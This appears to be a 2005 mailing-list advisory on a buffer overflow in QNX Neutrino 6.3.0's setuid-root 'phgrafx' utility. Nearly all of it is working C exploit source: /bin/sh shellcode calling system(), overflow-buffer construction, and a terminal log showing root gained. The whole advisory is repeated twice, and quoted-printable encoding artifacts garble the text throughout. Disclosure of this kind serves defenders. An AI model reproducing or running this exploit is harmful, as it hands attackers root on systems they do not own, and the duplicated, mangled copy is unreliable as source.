pasquale minervini
30/11/05, 07:00
a buffer overflow vulnerability in the utility "phgrafx" included in the
QNX Neutrino Realtime Operating System can potentially be exploited by mali=
cious
users to escalate their privileges (by default the application is suid and =
owned by root).
example:
qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=3D6(deadbeef) gid=3D1(bin) groups=3D0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: can not find palette under '5=B0|=D8H=E61=B0'.
# id
uid=3D6(deadbeef) gid=3D1(bin) euid=3D0(root) groups=3D0(root),3(sys),4(adm=
),5(tty)
#
source:
/*=20
* minervini@neuralnoise.com (c) 2005, all rights reserved.
* sample exploit for phgrafx on QNX 6.3.0 x86
*=20
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
*/=20
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>
#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif
#ifndef _RET_INIT
# define _RET_INIT (864)
#endif
/* thanks to my friend pi3 that suggested me to call a libc
* function to make the shellcode way shorter than it was */
char scode[] =3D "\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x54" // push %esp
"\xbb\xEF\xBE\xAD\xDE" // mov $0xDEADBEEF,%ebx
"\xff\xd3"; // call *%ebx
unsigned long get_sp (void) {
__asm__ ("movl %esp, %eax");
}
int main (int argc, char **argv) {
=20
int i, slen =3D strlen (scode), offset =3D 0;
long ptr, *lptr, addr;
char *buf;
void *handle;
=20
handle =3D dlopen (NULL, RTLD_LAZY);
addr =3D (long) dlsym (handle, "system");
=20
for (i =3D 0; i < 4; i++) {
char temp =3D (*((char *) &addr + i) & 0xff);
if (temp =3D=3D 0x00 || temp =3D=3D 0x09 || temp =3D=3D 0x0a) {
puts
("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, =
so it probably won't work since"
" the application seems to truncate those bytes. BTW you can rely on f=
unctions like exec*(), spawn*()"
" or MsgSend*() to get this working.\n"
"more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino=
/lib_ref/");
return (-1);
}
}
=20
memcpy((char *)&scode + 0xf, &addr, 4);
=20
if (argc > 1)
offset =3D strtoul(argv[1], NULL, 0);
=20
if (!(buf =3D (char *) malloc(1032)))
err(1, "malloc()");
=20
memset(buf, 0, 1032);
=20
for (i =3D 0; i < (_RET_INIT - slen); i++)
buf[i] =3D 'A'; // inc %ecx
=20
printf("shellcode length: %d\n", slen);
=20
for (i =3D (_RET_INIT - slen); i < _RET_INIT; i++)
buf[i] =3D scode[i - (_RET_INIT - slen)];
=20
lptr =3D (long *) (buf + _RET_INIT);
=20
printf("address: 0x%lx\n", ptr =3D (get_sp () - offset));
=20
for (i =3D 0; i < ((1024 - _RET_INIT) / 4); i++)
*(lptr + i) =3D (int) ptr;
=20
execl(_PATH, "phgrafx", buf, NULL);
=20
return (0);
}
--=20
p. minervini, minervini@neuralnoise.com
QNX Neutrino Realtime Operating System can potentially be exploited by mali=
cious
users to escalate their privileges (by default the application is suid and =
owned by root).
example:
qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=3D6(deadbeef) gid=3D1(bin) groups=3D0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: can not find palette under '5=B0|=D8H=E61=B0'.
# id
uid=3D6(deadbeef) gid=3D1(bin) euid=3D0(root) groups=3D0(root),3(sys),4(adm=
),5(tty)
#
source:
/*=20
* minervini@neuralnoise.com (c) 2005, all rights reserved.
* sample exploit for phgrafx on QNX 6.3.0 x86
*=20
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
*/=20
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>
#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif
#ifndef _RET_INIT
# define _RET_INIT (864)
#endif
/* thanks to my friend pi3 that suggested me to call a libc
* function to make the shellcode way shorter than it was */
char scode[] =3D "\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x54" // push %esp
"\xbb\xEF\xBE\xAD\xDE" // mov $0xDEADBEEF,%ebx
"\xff\xd3"; // call *%ebx
unsigned long get_sp (void) {
__asm__ ("movl %esp, %eax");
}
int main (int argc, char **argv) {
=20
int i, slen =3D strlen (scode), offset =3D 0;
long ptr, *lptr, addr;
char *buf;
void *handle;
=20
handle =3D dlopen (NULL, RTLD_LAZY);
addr =3D (long) dlsym (handle, "system");
=20
for (i =3D 0; i < 4; i++) {
char temp =3D (*((char *) &addr + i) & 0xff);
if (temp =3D=3D 0x00 || temp =3D=3D 0x09 || temp =3D=3D 0x0a) {
puts
("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, =
so it probably won't work since"
" the application seems to truncate those bytes. BTW you can rely on f=
unctions like exec*(), spawn*()"
" or MsgSend*() to get this working.\n"
"more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino=
/lib_ref/");
return (-1);
}
}
=20
memcpy((char *)&scode + 0xf, &addr, 4);
=20
if (argc > 1)
offset =3D strtoul(argv[1], NULL, 0);
=20
if (!(buf =3D (char *) malloc(1032)))
err(1, "malloc()");
=20
memset(buf, 0, 1032);
=20
for (i =3D 0; i < (_RET_INIT - slen); i++)
buf[i] =3D 'A'; // inc %ecx
=20
printf("shellcode length: %d\n", slen);
=20
for (i =3D (_RET_INIT - slen); i < _RET_INIT; i++)
buf[i] =3D scode[i - (_RET_INIT - slen)];
=20
lptr =3D (long *) (buf + _RET_INIT);
=20
printf("address: 0x%lx\n", ptr =3D (get_sp () - offset));
=20
for (i =3D 0; i < ((1024 - _RET_INIT) / 4); i++)
*(lptr + i) =3D (int) ptr;
=20
execl(_PATH, "phgrafx", buf, NULL);
=20
return (0);
}
--=20
p. minervini, minervini@neuralnoise.com